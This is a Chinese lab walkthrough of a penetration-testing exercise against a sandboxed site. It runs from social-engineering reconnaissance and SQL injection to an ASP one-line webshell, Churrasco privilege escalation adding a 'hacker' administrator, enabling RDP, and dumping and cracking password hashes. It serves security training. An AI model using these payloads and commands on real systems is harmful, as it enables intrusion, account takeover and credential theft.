作者：独狼1927
来源：02-在线挑战详细攻略-《网站综合渗透实验》

系列文章：
01-在线挑战详细攻略-《我很简单，请不要欺负我》
03-在线挑战详细攻略-《又见DZ，我能拿你怎么办》
04-在线挑战详细攻略-《2015中国网络安全大赛：Reinstall真题》
05-在线挑战详细攻略-《2015中国网络安全大赛：框架漏洞真题》

<h1>Step 0</h1>
实验环境
操作机：Windows XP [172.16.11.2]
目标网址：www.test.com [172.16.12.2]
ps：www.test.com www.test.ichunqiu都是可以的

实验工具：
中国菜刀 ipscan MD5Crack2
Domain3.6 NTscan字典 saminside
SuperScan30 X-Scan-v3.3
亦思想社会工程学字典生成器
本实验要求获取www.test.com网站的服务器权限。
ps：图片可单击放大观看。

<h1>Step 1</h1>
从题目要求可以看出，这个实验明显是要突出社会工程学，所以搜集信息就是必须的了，尽可能的搜集！
打开浏览器，进入网站首页，眼尖的童鞋会发现菜单最右边写着 [摄影论坛]，果断进入论坛转转；

进入论坛后，寻找与linhai有关的信息，发现有他发表的文章，点击斑竹名称 [linhai]；

额~ 没有登录还不能查看，那就果断注册吧！点击左侧的[注册] 菜单进入注册页面，不要点上边的注册，进不去；

点击页面下方的 [我同意] 进行下一步；（不同意不行啊^_^）

把表单中带星星的都填上，最重要的是记住用户名和密码，别刚注册完就忘了~ （芸芸众生中这样的事情经常发生）

填完点击 [申请] 进行提交；注册完有了自己的账号后，你就可以看到linhai的信息了，用户名就不用说了，问题里已经给了；

注意签名栏：生于唐山大地震！中国人应该都知道唐山大地震是哪一年发生的吧~

Paste_Image.png

Linhai的出生年份已经搞定，回到秋潮视觉工作室首页，页面底部有linhai的电子邮箱，0812很有可能就是linhai的生日；还有他的QQ号：1957692；
综上所述，我们目前获得的信息包括：
用户名：Linhai
出生日期： 1976年08月12日
Email：linhai0812@21cn.com
QQ：1957692
顺带着发现了后台入口…

点击 [管理入口] 就可以进入后台登录页面；

Paste_Image.png

当然绝大多数后台是不会直接爆出来的，得用工具；
目录扫描
工具：御剑 路径：C:\Tools\目录扫描
打开御剑，在域名中输入http://www.test.com，开始扫描

在目录列表中查找后台，发现存在/admin/login.asp

回到后台登录页面，当然用户名和密码都不知道，利用我们之前获得的社工信息，加上注入，进一步获取用户名和密码。

<h1>Step 2</h1>

工具：旁注WEB综合检测程序Ver3.6修正版
路径：C:\Tools\注入工具\Domain3.6\Domain3.6.exe

打开工具，依次点击 [SQL注入] -->[批量扫描注入点] --> [添加网址] --> [批量分析注入点]；

出现下面这个对话框说明已经检测完毕；

点击OK进行下一步；

注入点分析完毕后，会在下方列表中显示可注入的地址，选择其中一个地址，右键选择[检测注入]；

检测完毕后，显示可以注入，并列出了数据库类型：Access数据库；

下面开始逐步 [猜解表名] -->[猜解列名]--> [猜解内容]； 点击 [猜解表名] 后，在数据库列表中会显示3个表，分别是admin、news和config；

选择admin表，点击 [猜解列名]，成功猜解出三个列名id、admin和password；

勾选admin和password，点击 [猜解内容]，右侧列表中成功显示用户名linhai，密码d7e15730ef9708c0

下一步，打开字典生成器，生成字典； 工具：亦思想社会工程学字典生成器 路径：C:\Tools\社会辅助\亦思想社会工程学字典生成器\亦思想社会工程学字典生成器.exe

打开社工工具亦思想社会工程学字典生成器，输入之前获得的社工信息，生成字典；

点击 [生成字典] 之后，会在工具同一目录下生成mypass.txt，这个就是我们需要的字典；

打开MD5破解工具，准备破解； 工具：MD5Crack2.exe 路径： C:\Tools\破解工具\MD5\ MD5Crack2.exe

打开破解工具，输入我们获得的密码密文，选择 [使用字典]；

点击 [浏览] 按钮，选择刚刚生成的社工字典mypass.txt；注意，如果找不见文件，在文件类型中选择全部文件；

点击 [开始] 按钮进行暴力破解，运气很好，秒破！

也可以直接上网进行破解，打开[http://www.somd5.com](http://www.somd5.com/)，输入让你无语的MD5：d7e15730ef9708c0，因为有人提交过，也是秒破；

成功找到明文密码：linhai19760812 下一步：登录后台，上传木马，GETSHELL；

<h1>Setp3</h1>
打开后台登录页面，输入用户名linhai，密码linhai19760812，输入验证码，点击 [登陆] 按钮登录后台；

成功进入后台

点击 [设置管理] --> [系统变量设置]，发现系统设置中有上传图片的地方，下一步，构造图片木马；

在桌面上新建一个文本文件，在里面写入一句话木马
<code><%Eval Request("ichunqiu")%></code>
后面随便输入一些内容，纯粹是为了增加图片体积，但要注意，几十Kb足矣，体积太大太小都不行；

然后将文件重命名为jpg格式文件；

打开后台页面，点击 [上传图片]，把刚才构造的图片传上去；

然后点击 [生成代码]；

代码生成后，复制图片路径！[很重要]

关键步骤到了！点击左侧菜单 [数据管理]-->[备份/恢复数据库]，把 [数据库路径] 修改为刚才复制的图片路径，[备份的数据库路径] 修改为后缀名为asp的文件，文件名自己取，记住就行，然后点击备份；[ 特别注意：两个路径的最前面都有斜杠 ]

备份成功！

Paste_Image.png

打开 [中国菜刀] 连接一句话木马；
工具：中国菜刀 路径：C:\Tools\webshell\中国菜刀\chopper.exe

Paste_Image.png

打开菜刀，右键空白处，选择 [添加]；

在地址栏中输入刚才备份数据库的路径，填写连接密码 [密码在一句话里]，点击 [添加]；

添加成功后会新增一条记录；

双击这个URL，成功进入！那个test.asp就是卧底！

下一步，添加账户-->开启3389-->远程桌面连接-->获取管理员账户密码；

<h1>Step 4</h1>
进入C:\RECYCLER目录，准备上传提权工具；

Paste_Image.png

提权工具包括Churrasco.exe，3389，cmd，路径：C:\Tools\提权工具\windows

Paste_Image.png

Churrasco.exe 中文名：巴西烤肉！
Churrasco.exe是Windows2003系统下的一个本地提权漏洞，通过此工具可以以SYSTEM权限执行命令，从而可以达到添加用户的目的。
补丁名：KB956572 MS09-012
使用方法：
<code>Churrasco "net user hacker 123 /add && net localgroup administrators hacker /add"</code>
两行命令的意思分别是：
netuser hacker 123 /add -->添加一个用户名为hacker、密码为123的账户；
netlocalgroup administrators hacker /add -->将账户hacker添加到管理员组；
开始上传工具，选中这三个文件，用鼠标直接拖到中国菜刀中，即可完成上传；

Paste_Image.png

下一步，执行提权操作；右键cmd.exe，选择 [虚拟终端]

Paste_Image.png

成功进入，将目录切换到C:\RECYCLER

Paste_Image.png

用Churrasco.exe执行cmd命令，添加账户；
<code>Churrasco "net user hacker 123 /add"</code>

Paste_Image.png

账户添加成功，继续下一步，将新增的账户添加到管理员组；
<code>Churrasco "net localgroup administrators hacker /add"</code>

Paste_Image.png

添加成功，下一步，开启3389；
<code>Churrasco 3389</code>

Paste_Image.png

如果出现如上图中的命令，说明执行成功了，不成功就多执行几次命令，下一步，连接目标机；
[开始]-->[运行]-->mstsc

Paste_Image.png

如果找不见目标IP地址，请点击右上角 [场景拓扑图] 进行查看：

Paste_Image.png

输入目标IP地址：172.16.12.2，开始连接，继续输入用户名hacker和密码123，进入系统；

Paste_Image.png

Paste_Image.png

3389连接成功！下一步，获取系统管理员密码，准确的说是获取系统管理员密码的hash，上传密码获取工具 [中国菜刀]；
工具很多，这里我们使用Pwdump7；

Paste_Image.png

工具：Pwdump7 路径： C:\Tools\提权工具\hash\Pwdump7；[ 注意，一定要将libeay32.dll一并上传，否则执行不了 ]

Paste_Image.png

上传成功！

Paste_Image.png

进入目标机，将CMD目录切换到RECYCLER，运行一条命令：
<code>Pwdump7 > hash.txt</code>

Paste_Image.png

运行成功后，会在同一目录下生成一个文本文件hash.txt；

Paste_Image.png

打开hash.txt，成功获取到administrator的hash：
3C8D6C158F6FB3D1FDCFC2AFB2D1BE34:594B9CD2577A5AC2BE0CA522D5EC6ACE

Paste_Image.png

暂时切换出实验环境，在你的电脑上打开浏览器输入
http://www.objectif-securite.ch/en/ophcrack.php，在页面的相应位置输入hash，然后GO
ps：如果打不开就翻墙，或者用其他类似功能的网站也可以，这样的站很多；

Paste_Image.png

最终输出结果：

Paste_Image.png

<h1>Step 5</h1>
数据库sa密码在哪找？
WEB应用与数据库之间会有一个配置文件，用来保存数据库连接信息，包括数据库驱动、数据库名、用户名、密码等信息，找到这个文件就找到了密码
文件名：conn_old.asp
路径： C:\Inetpub\wwwroot\conn_old.asp

Paste_Image.png

打开文件即可见到Password；

Paste_Image.png

<h1>Step 6</h1>
Linhai论坛登录密码在哪里？
进入C:\Inetput\wwwroot\bbs\Data
发现有ldb文件，一般情况下肯定有mdb文件，看体积应该是dtxy.asp这个文件；

Paste_Image.png

把这个文件通过菜刀下载到本地，用Domain3.6或其他数据库浏览器工具查询即可；

Paste_Image.png

把dtxy.asp修改为数据库文件dtxy.mdb；

Paste_Image.png

打开Domain3.6，点击 [数据库管理]-->[文件]-->[打开数据库]，找到文件dtxy.mdb并打开；

Paste_Image.png

找到表LeadBBS_User，第三条记录就是linhai，密码hash：e10adc3949ba59abbe56e057f20f883e

Paste_Image.png

暂时撤出实验环境，用你本机的浏览器打开http://www.cmd5.com，输入密文，点击破解~

Paste_Image.png

本次实验到此结束，希望对大家有所帮助，有不足之处请多多指正！
下一讲：《又见DZ，我能拿你怎么办》

ps：部分知识点的内容转自网络；路漫漫其修远兮，感谢一路上黑友们的帮助@lonnyboy；
Dareand the world always yields.

--END--
本文来自：i春秋社区